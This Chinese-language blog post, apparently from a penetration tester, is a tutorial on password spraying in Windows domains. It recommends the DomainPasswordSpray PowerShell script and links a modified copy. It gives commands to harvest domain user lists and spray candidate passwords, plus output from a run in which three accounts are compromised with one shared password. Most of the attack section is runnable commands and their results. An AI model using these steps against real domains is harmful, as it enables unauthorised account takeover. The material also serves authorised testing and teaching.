倾旋的博客

倾旋的博客

现阶段在进行有效性验证/攻击模拟相关的安全研究工作,我的博客会记录一些我的学习过程和部分安全技术研究成果。

02 May 2018

Windows域渗透 - 用户密码枚举

0x00 前言

在进行Windows域渗透的时候,面对庞大的用户账号,不知该从何下手,扫描网络服务有怕搞出大动静,肿么办呢?

0x01 Powershell

目前已经有很多Powershell集合脚本,用于域渗透简直舒爽

今天推荐一款名字叫DomainPasswordSpray.ps1的脚本,主要原理是先来抓取域用户账号,然后指定密码字典进行域认证。认证通过的就是密码正确的了。

0x00

GitHub项目地址:https://github.com/dafthack/DomainPasswordSpray

由于作者的脚本有一个小瑕疵,故此我改了一下,避免抛出了一些错误。

0x01

优化后的地址:http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt

0x02 参数说明

在代码的开头就已经有介绍了,我简单汉化一下。

描述:该模块主要用于从域中收集用户列表。

0x03 使用说明

使用例子:

C:\PS> Get-DomainUserList

该命令将从域中收集用户列表。

C:\PS> Get-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

该命令将收集域“域名”中的用户列表,包括任何未被禁用且未接近锁定状态的帐户。 它会将结果写入“userlist.txt”文件中

C:\PS> Invoke-DomainPasswordSpray -Password Winter2016

该命令将会从域环境中获取用户名,然后逐个以密码Winter2016进行认证枚举

C:\PS> Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList passlist.txt -OutFile sprayed-creds.txt

该命令将会从users.txt中提取用户名,与passlist.txt中的密码对照成一对口令,进行域认证枚举,登录成功的结果将会输出到sprayed-creds.txt

0x04 实战

获取域环境中的用户列表

命令:C:\PS> Get-DomainUserList | Out-File -Encoding ascii userlist.txt

输出:

1
2
3
4
5

[*] Current domain is compatible with Fine-Grained Password Policy.
[*] Now creating a list of users to spray...
[*] There appears to be no lockout policy.
[*] There are 8 total users found.
[*] Created a userlist containing 8 users gathered from the current user's domain

获取的用户名:

1
2
3
4
5
6
7
8
9

C:\PS> type .\userlist.txt
Administrator
Guest
liyingzhe
krbtgt
Hack
testPass
webManager
dba

密码枚举

0x02

命令: C:\PS> Invoke-DomainPasswordSpray -Domain 域名 -Password w!23456 -OutFile sprayed-creds.txt

输出:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

[*] Current domain is compatible with Fine-Grained Password Policy.
[*] Now creating a list of users to spray...
[*] There appears to be no lockout policy.
[*] Removing disabled users from list.
[*] There are 6 total users found.
[*] Removing users within 1 attempt of locking out from list.
[*] Created a userlist containing 6 users gathered from the current user's domain
[*] Password spraying has begun. Current time is 18:45
[*] This might take a while depending on the total number of users
1 of 6 users tested2 of 6 users tested3 of 6 users tested[*] SUCCESS! User:testPass Password:w!23456
4 of 6 users tested[*] SUCCESS! User:webManager Password:w!23456
5 of 6 users tested[*] SUCCESS! User:dba Password:w!23456
6 of 6 users tested[*] Password spraying is complete
[*] Any passwords that were successfully sprayed have been output to sprayed-creds.txt

枚举的结果:

1
2
3
4

C:\PS > type .\sprayed-creds.txt
testPass:w!23456
webManager:w!23456
dba:w!23456